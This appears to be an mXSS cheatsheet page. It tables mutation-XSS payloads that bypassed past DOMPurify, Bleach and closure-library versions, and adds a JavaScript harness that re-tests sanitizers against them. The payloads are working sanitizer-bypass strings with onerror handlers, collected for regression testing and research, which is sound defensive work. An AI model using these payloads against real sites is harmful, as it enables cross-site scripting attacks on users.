XSS


mXSS

Payload examples

Mutation XSS (mXSS) abuses the gap between the DOM a sanitizer inspects and the DOM the browser builds when the sanitizer's serialized output is parsed a second time: in the first tree the `<img>` of each payload below sits harmlessly inside a comment, a `<style>` element or an attribute value, and only after serialization and re-parsing (typically `element.innerHTML = cleanString`) does it become a live element with an `onerror` handler. This page lists payloads that have bypassed sanitizers in the past. There are many other published variants, but to avoid redundancy only those that introduced a new vector or technique are included. The version column is the release each payload was reported against; every one of them has since been fixed, so treat the list as a regression set to re-run against the build you ship, not as a set of current bypasses.

DOMPurify

| Version | Payload | Credit | Additional links |
|---|---|---|---|
| 2.0.0 | `<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">` | Michał Bentkowski | @SecurityMB https://research.securitum.com/dompurify-bypass-using-mxss/ |
| 2.0.17 | `<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>` | Michał Bentkowski | @SecurityMB https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/ |
| 2.0.17 | `<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">` | Gareth Heyes | @garethheyes https://portswigger.net/research/bypassing-dompurify-again-with-mutation-xss |
| 2.0.17 | `<math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=alert(1)">` | @web_payload team | @sqrtrev @0xParrot @GuesserSuper https://twitter.com/0xsapra/status/1307929537749999616?ref_src=twsrc%5Etfw |
| 2.2.0 | `<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">` | Daniel Santos | @bananabr https://vovohelo.medium.com/from-svg-and-back-yet-another-mutation-xss-via-namespace-confusion-for-dompurify-2-2-2-bypass-5d9ae8b1878f |
| 2.2.3 | `<svg><xss><desc><noscript>&lt;/noscript>&lt;/desc>&lt;p>&lt;/p>&lt;style>&lt;a title="&lt;/style>&lt;img src onerror=alert(1)>">` | Michał Bentkowski | @SecurityMB https://twitter.com/SecurityMB/status/1341290687963262978 |
| 3.0.8 | `<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">` | Kévin - Mizu | @kevin_mizu https://mizu.re/post/playing-with-dompurify-ce-handling |
| 3.1.0 | ``var n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;`` | N/A | icesfont |
| 3.1.7 | `<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">` | Masato Kinugawa | @kinugawamasato https://x.com/kinugawamasato/status/1843687909431582830 |

Mozilla Bleach

| Version | Payload | Credit | Additional links |
|---|---|---|---|
| 3.1.0 | `<noscript><style></noscript><img src=x onerror=alert(1)>` | Yaniv Nizry | @YNizry https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/ |
| 3.1.1 | `<svg><style><img src=x onerror=alert(1)>` | Yaniv Nizry | @YNizry https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/ |
| 3.2.3 | `<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>` | Yaniv Nizry | @YNizry https://github.com/mozilla/bleach/security/advisories/GHSA-vv2x-vrpj-qqpq |

Google closure-library

| Version | Payload | Credit | Additional links |
|---|---|---|---|
| v20190215 | `<noscript><p title="</noscript><img src=x onerror=alert(1)>">` | Masato Kinugawa | @kinugawamasato https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa |
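As an added regression check (this harness is not part of the mXSS cheatsheet, of DOMPurify, or of the page's original content), the script below pushes every payload on this page through a sanitizer and then re-parses the sanitized string the way a consumer does, with `innerHTML`, reporting any `<script>` element or `on*` attribute that exists in the second tree. It assumes a browser (or jsdom) environment that exposes `document` and a global `DOMPurify` whose `sanitize()` returns a string, as the library's browser bundle provides; the payload list is transcribed from the tables above, and the `sanitize`/`parse` callbacks and every helper name are this example's own. The Bleach and closure-library payloads are included too, because the mutation lives in the browser parser and any HTML sanitizer is worth checking against them.

```javascript
// Added example: mXSS regression harness. Not from the mXSS cheatsheet or
// from DOMPurify; the payload list is transcribed from the tables above and
// every function name here is this example's own.
//
// Why the round trip matters: a sanitizer judges the tree it built from its
// input, but the consumer re-parses the sanitizer's *serialized* output. The
// payloads below are harmless in the first tree (the <img> sits inside a
// comment, a <style> or an attribute value) and only become a real element
// with an event handler after serialization and a second parse.

const MXSS_PAYLOADS = [
  { target: 'DOMPurify 2.0.0', html: '<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">' },
  { target: 'DOMPurify 2.0.17', html: '<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>' },
  { target: 'DOMPurify 2.0.17', html: '<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">' },
  { target: 'DOMPurify 2.0.17', html: '<math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=alert(1)">' },
  { target: 'DOMPurify 2.2.0', html: '<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">' },
  { target: 'DOMPurify 2.2.3', html: '<svg><xss><desc><noscript>&lt;/noscript>&lt;/desc>&lt;p>&lt;/p>&lt;style>&lt;a title="&lt;/style>&lt;img src onerror=alert(1)>">' },
  { target: 'DOMPurify 3.0.8', html: `<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">` },
  // 3.1.0: the nesting-depth variant from the table, built instead of pasted.
  { target: 'DOMPurify 3.1.0', html: '<div>'.repeat(506) + '<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>' + '</div>'.repeat(506) },
  { target: 'DOMPurify 3.1.7', html: '<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">' },
  { target: 'Bleach 3.1.0', html: '<noscript><style></noscript><img src=x onerror=alert(1)>' },
  { target: 'Bleach 3.1.1', html: '<svg><style><img src=x onerror=alert(1)>' },
  { target: 'Bleach 3.2.3', html: '<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>' },
  { target: 'closure-library v20190215', html: '<noscript><p title="</noscript><img src=x onerror=alert(1)>">' },
];

// Walk a parsed tree and list everything that would execute: <script>
// elements and any element carrying an on* attribute. It looks at attribute
// *names*, so sanitized output whose attribute values or text merely contain
// the string "onerror=" (most of these payloads, once neutralised) is not
// reported as a bypass.
function findActiveContent(root) {
  const hits = [];
  (function walk(node) {
    if (node.nodeType === 1) { // Node.ELEMENT_NODE
      const tag = node.tagName.toLowerCase();
      if (tag === 'script') hits.push('<script>');
      for (const attr of Array.from(node.attributes)) {
        if (/^on/i.test(attr.name)) hits.push(`<${tag} ${attr.name.toLowerCase()}>`);
      }
    }
    for (const child of Array.from(node.childNodes)) walk(child);
  })(root);
  return hits;
}

// Re-parse the way a consumer does (element.innerHTML = cleanString), but into
// a document created with createHTMLDocument: it has no browsing context, so
// nothing in the parsed fragment runs script or fetches <img src> while we look.
function reparse(html, doc = document) {
  const inert = doc.implementation.createHTMLDocument('');
  const div = inert.createElement('div');
  div.innerHTML = html;
  return div;
}

// sanitize: (html) => cleanString; parse: (cleanString) => root node.
// Returns one row per payload; bypassed === true means the second parse of
// the sanitizer's output still contains executable content.
function runRegression(sanitize, parse, payloads = MXSS_PAYLOADS) {
  return payloads.map(({ target, html }) => {
    const clean = sanitize(html);
    const survivors = findActiveContent(parse(clean));
    return { target, clean, survivors, bypassed: survivors.length > 0 };
  });
}

// Browser entry point; assumes the DOMPurify browser bundle is loaded as a global.
if (typeof DOMPurify !== 'undefined' && typeof document !== 'undefined') {
  const rows = runRegression((h) => DOMPurify.sanitize(h), (h) => reparse(h, document));
  console.table(rows.map(({ target, bypassed, survivors }) => ({ target, bypassed, survivors: survivors.join(' ') })));
}
```

Paste it into the devtools console of a page that loads the DOMPurify build you want to check. A row with `bypassed: true` reproduces that payload's bypass on that build (the `clean` field shows the sanitizer's output that mutated); on a current release every row should be `false`. To test a server-side sanitizer such as Bleach, replace the `sanitize` callback with a function that sends the payload to that endpoint and returns its output, keeping the same `reparse` step, since the second parse must still be done by the browser engine that will render the result.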
Sources: the tables above are taken from the mXSS cheatsheet (source of table); see also https://www.youtube.com/watch?v=lG7U3fuNw3A